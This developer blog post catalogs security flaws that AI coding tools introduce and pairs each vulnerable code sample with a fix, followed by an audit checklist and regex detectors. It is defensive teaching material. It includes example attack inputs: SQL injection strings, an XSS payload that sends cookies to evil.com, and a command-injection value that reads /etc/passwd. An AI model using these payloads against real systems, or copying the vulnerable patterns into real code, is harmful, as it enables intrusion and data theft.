Vitalii Petrenko

I Checked What Security Vulnerabilities AI Coding Tools Actually Introduce

Last month I started going through PRs and open-source repos, cataloging the security vulnerabilities that AI coding tools actually introduce. Not theoretical risks. Actual patterns showing up in production code, backed by security research.

The numbers are bad. Veracode tested over 100 LLMs across Java, Python, C#, and JavaScript. 45% of generated code samples failed security tests. AI tools failed to defend against XSS in 86% of relevant samples. Apiiro found that AI-assisted developers produce 3-4x more code but generate 10x more security issues. Read that again. 10x.

The patterns are predictable, though. Once you know what to look for, you start seeing them everywhere.

1. SQL injection still happening in 2026

Ask ChatGPT or Copilot for a database query endpoint and you'll get something like this:

// VULNERABLE
app.get('/user', async (req, res) => {
  const userId = req.query.id;
  const sql = `SELECT * FROM users WHERE id = ${userId}`;
  connection.query(sql, (err, results) => {
    if (err) return res.status(500).send('Error');
    res.json(results[0]);
  });
});

Send ?id=1 OR 1=1 and you dump the entire users table. Send ?id=1; DROP TABLE users;-- and, if the driver allows multiple statements, the table is gone.

String interpolation is shorter than parameterized queries, so that's what the model generates. It optimizes for "works," not "safe."

The fix:

// SECURE
app.get('/user', async (req, res) => {
  const userId = parseInt(req.query.id, 10);
  if (!Number.isInteger(userId)) {
    return res.status(400).send('Invalid id');
  }
  const sql = 'SELECT * FROM users WHERE id = ?';
  connection.query(sql, [userId], (err, results) => {
    if (err) return res.status(500).send('Error');
    res.json(results[0]);
  });
});

Same thing in Python. AI generates f-strings in SQL every time:

# VULNERABLE
query = f"SELECT * FROM posts WHERE title LIKE '%{term}%'"
cur.execute(query)

# SECURE
query = "SELECT * FROM posts WHERE title LIKE ?"
cur.execute(query, (f"%{term}%",))

Why? Training data is full of tutorials and Stack Overflow answers that use string interpolation for brevity. The model just reproduces the most common pattern, and the most common pattern happens to be the insecure one.

2. XSS, with an 86% failure rate

Veracode's number on this one surprised me. 86% of the time, AI-generated code failed to defend against cross-site scripting. The pattern is simple:

// VULNERABLE
app.get('/greet', (req, res) => {
  const name = req.query.name || 'Guest';
  res.send(`<h1>Hello, ${name}!</h1>`);
});

Payload: ?name=<script>fetch('https://evil.com/steal?c='+document.cookie)</script>

In React and Next.js it looks different but the result is the same:

// VULNERABLE
function Comment({ text }: { text: string }) {
  return <div dangerouslySetInnerHTML={{ __html: text }} />;
}

If text comes from user input or an API without sanitization, you've got stored XSS.

The fixes:

// Server-side: escape HTML
function escapeHtml(str) {
  return String(str)
    .replace(/&/g, '&amp;').replace(/</g, '&lt;')
    .replace(/>/g, '&gt;').replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;'); // single quotes matter in attribute contexts
}
app.get('/greet', (req, res) => {
  const name = escapeHtml(req.query.name || 'Guest');
  res.send(`<h1>Hello, ${name}!</h1>`);
});

// React: render as text, not HTML
function Comment({ text }: { text: string }) {
  return <div>{text}</div>;
}

Most training examples show the shortest path to rendering dynamic content. Output encoding adds code that doesn't make demos look better, so the model skips it.
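A quick sanity check that escaping actually neutralizes the payload from earlier (the helper is repeated here so the snippet runs on its own):

```javascript
// HTML-escaping helper like the one above, repeated so this runs standalone
function escapeHtml(str) {
  return String(str)
    .replace(/&/g, '&amp;').replace(/</g, '&lt;')
    .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

const payload = "<script>fetch('https://evil.com/steal?c='+document.cookie)</script>";
const escaped = escapeHtml(payload);

// The browser now renders this as inert text instead of executing it
console.log(escaped.includes('<script>'));        // false
console.log(escaped.startsWith('&lt;script&gt;')); // true
```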

3. Hardcoded secrets

This one is everywhere, and I mean everywhere. GitGuardian analyzed ~20,000 Copilot-active repos and found a 6.4% secret leakage rate vs 4.6% across all public repos, about 40% higher (State of Secrets Sprawl 2025).

// VULNERABLE
const STRIPE_KEY = 'sk_live_51Nxxxxxxxxxxxxxxxx';
const DB_PASSWORD = 'P@ssw0rd123';
const JWT_SECRET = 'my_super_secret_jwt_key';

const stripe = require('stripe')(STRIPE_KEY);

The model saw thousands of tutorials with hardcoded keys. It reproduces them faithfully.

# VULNERABLE
SMTP_USER = "noreply@example.com"
SMTP_PASS = "supersecretpassword"

server = smtplib.SMTP("smtp.example.com", 587)
server.login(SMTP_USER, SMTP_PASS)

The fix is obvious but the AI doesn't apply it:

// SECURE
const STRIPE_KEY = process.env.STRIPE_API_KEY;
if (!STRIPE_KEY) throw new Error('Missing STRIPE_API_KEY');

const stripe = require('stripe')(STRIPE_KEY);

Here's the thing that makes this worse than the other patterns: these secrets end up in git history. Even if you delete them from the file, they're recoverable from the commit log. One leaked Stripe key means unauthorized charges. One leaked AWS credential can mean someone owns your entire infrastructure.

4. Command injection

Ask AI to "run a ping command" or "create a backup" and you'll get exec() with template literals:

// VULNERABLE
const { exec } = require('child_process');

app.post('/ping', (req, res) => {
  const host = req.body.host;
  exec(`ping -c 4 ${host}`, (error, stdout) => {
    res.send(stdout);
  });
});

Send host=8.8.8.8; cat /etc/passwd and the response includes the contents of the server's /etc/passwd.

# VULNERABLE
cmd = f"tar -czf /tmp/backup.tgz {path}"
subprocess.check_output(cmd, shell=True)

The fix:

// SECURE
const { spawn } = require('child_process');

app.post('/ping', (req, res) => {
  const host = req.body.host;
  if (!/^[a-zA-Z0-9.\-]{1,253}$/.test(host)) {
    return res.status(400).send('Invalid host');
  }
  const child = spawn('ping', ['-c', '4', host], { shell: false });
  let output = '';
  child.stdout.on('data', d => output += d);
  child.on('close', () => res.send(output));
});

exec() with template literals is fewer lines than spawn() with argument arrays. The model picks the concise path.

5. The ones that pass code review

These aren't exotic. They're the kind of thing you'd glance at and approve because nothing looks obviously wrong.

Empty catch blocks that silently bypass auth:

try { await verifyToken(token); }
catch (e) { /* AI leaves this empty */ }
// Execution continues even if token is invalid
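The fix is to treat a failed verification as a hard stop. A minimal sketch (verifyToken here is a stub standing in for a real JWT or session verifier, so the snippet runs on its own):

```javascript
// Stub standing in for a real token verifier that throws on bad input
async function verifyToken(token) {
  if (token !== 'valid-token') throw new Error('invalid token');
  return { userId: 42 };
}

// Express-style middleware: on failure, respond 401 and stop -- never fall through
async function requireAuth(req, res, next) {
  try {
    req.user = await verifyToken(req.headers.authorization);
    next();
  } catch (e) {
    res.status(401).send('Unauthorized'); // the empty-catch version skips this line
  }
}
```

The important part is that the catch block ends the request instead of letting execution continue as if the token were valid.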

CORS wildcards on APIs that use cookies or tokens:

app.use(cors({ origin: '*' }));
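If the API uses cookies or auth headers, the origin needs to be an explicit allowlist. The cors package accepts a function for this; the check itself is plain JavaScript (the domains below are placeholders, not from the post):

```javascript
// Explicit allowlist -- placeholder domains, replace with your real origins
const ALLOWED_ORIGINS = new Set([
  'https://app.example.com',
  'https://admin.example.com',
]);

// Matches the origin(origin, callback) shape the cors package expects
function checkOrigin(origin, callback) {
  // No Origin header means a non-browser client (curl, server-to-server); allow it
  if (!origin || ALLOWED_ORIGINS.has(origin)) {
    return callback(null, true);
  }
  callback(new Error('Not allowed by CORS'));
}

// app.use(cors({ origin: checkOrigin, credentials: true }));
```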

The AI "fix" for certificate errors in Python, which disables TLS verification entirely (the real fix is pointing requests at the correct CA bundle, not turning verification off):

requests.get(url, verify=False)

Math.random where you need unpredictable tokens:

// VULNERABLE
const token = Math.random().toString(36).substring(2);

// SECURE
const crypto = require('crypto');
const token = crypto.randomBytes(32).toString('hex');

Client-side auth with no server-side validation:

function AdminPage() {
  const { user } = useAuth();
  if (!user?.isAdmin) return <Redirect to="/" />;
  return <AdminDashboard />;
  // Meanwhile, the API endpoints have zero auth checks
}
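The client-side redirect is fine as UX, but every sensitive API route needs its own server-side guard. A sketch of what that might look like (requireAdmin and the role field are illustrative names, assuming earlier middleware already populated req.user):

```javascript
// Illustrative role guard -- assumes req.user was set by auth middleware upstream
function requireAdmin(req, res, next) {
  if (!req.user || req.user.role !== 'admin') {
    return res.status(403).send('Forbidden'); // enforced on the server, not just in React
  }
  next();
}

// app.get('/api/admin/stats', requireAuth, requireAdmin, statsHandler);
```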

None of these alone will make headlines. But they show up in clusters, and they compound. I've seen PRs with three or four of these at once.

The scale of this

85% of developers now use AI coding assistants (JetBrains 2025). 46% of new code from active Copilot users is AI-generated, up from 27% in 2022. Somewhere between 40% and 62% of that code has security vulnerabilities, depending on which study you look at.

Fixing a vulnerability during code review costs $200-800 in developer time. In production? $3,000-10,000+. If it leads to a breach, IBM puts the average at $4.44 million.

The Stanford/Boneh research group found something that I keep coming back to: developers using AI wrote less secure code while feeling more confident about security. That confidence gap might be the most dangerous part of all this.

Quick PR audit checklist

Before you merge your next PR, grep or ctrl+F for these:

  1. String interpolation in SQL - any ${} or f-string near SELECT, INSERT, UPDATE, DELETE
  2. innerHTML / dangerouslySetInnerHTML - if the data comes from users or an API, it's XSS
  3. Hardcoded strings that look like keys - sk_live_, AKIA, ghp_, passwords in quotes
  4. exec() or shell=True with variables - if user input reaches a shell command, it's game over
  5. Empty catch blocks - especially around auth/token verification
  6. Math.random() for tokens or IDs - predictable, not secure
  7. cors({ origin: '*' }) on routes that use cookies or auth headers
  8. verify=False in Python requests - disables all TLS checks
  9. Client-side-only auth - open each API route that serves sensitive data and verify there's a server-side auth check
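
Most of the checklist is greppable. Here's a rough Node sketch that runs the pattern-level checks over a string of source code. The regexes are my approximations of the checklist items, noisy by design; treat hits as things to eyeball, not verdicts:

```javascript
// Rough regexes for the pattern-level checklist items -- expect false positives
const CHECKS = [
  { name: 'string interpolation in SQL', re: /(SELECT|INSERT|UPDATE|DELETE)[^;\n]*\$\{/i },
  { name: 'dangerous HTML sink',         re: /innerHTML|dangerouslySetInnerHTML/ },
  { name: 'hardcoded secret',            re: /sk_live_|AKIA[0-9A-Z]{16}|ghp_[A-Za-z0-9]{20,}/ },
  { name: 'shell with variables',        re: /exec\(`|shell\s*=\s*True/ },
  { name: 'Math.random token',           re: /Math\.random\(\)/ },
  { name: 'CORS wildcard',               re: /origin:\s*['"]\*['"]/ },
  { name: 'TLS verification disabled',   re: /verify\s*=\s*False/ },
];

// Returns the names of the checks that fired on the given source text
function auditSource(code) {
  return CHECKS.filter(c => c.re.test(code)).map(c => c.name);
}
```

Point it at the diff of a PR rather than the whole repo and the signal-to-noise ratio gets much better.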

If you find zero issues, either your codebase is unusually clean or you're not looking hard enough. I've never audited a repo with AI-generated code and come up empty.

What I do about it

I'm not going to tell you to stop using AI coding tools. I use them every day. But I've started treating AI-generated code the way I'd treat code from a fast but careless junior developer: assume security is missing until proven otherwise.

The checklist above catches the pattern-level stuff. For logic-level vulnerabilities (auth bypasses, SSRF, broken session management), I run a separate AI pass specifically prompted for security analysis. AI is actually good at finding vulnerabilities when you explicitly ask it to look for them.

I ended up automating both of those steps into a VS Code extension called Git AutoReview. It runs 15 regex security rules locally plus a specialized AI security pass on every PR. Works with GitHub, GitLab, and Bitbucket. BYOK, so your code goes straight to your AI provider. Free tier is 10 reviews/day.

But the checklist works without any tool. Print it, tape it to your monitor, run it on your last three PRs. I'd bet money you'll find something.


Sources: Stanford/NYU Copilot Study, Veracode 2025 GenAI Code Security Report, IBM 2025 Cost of a Data Breach, Apiiro (June 2025), GitGuardian Secret Sprawl Report, Kaspersky Blog: Vibe Coding Security Risks, OWASP Top 10 2025.
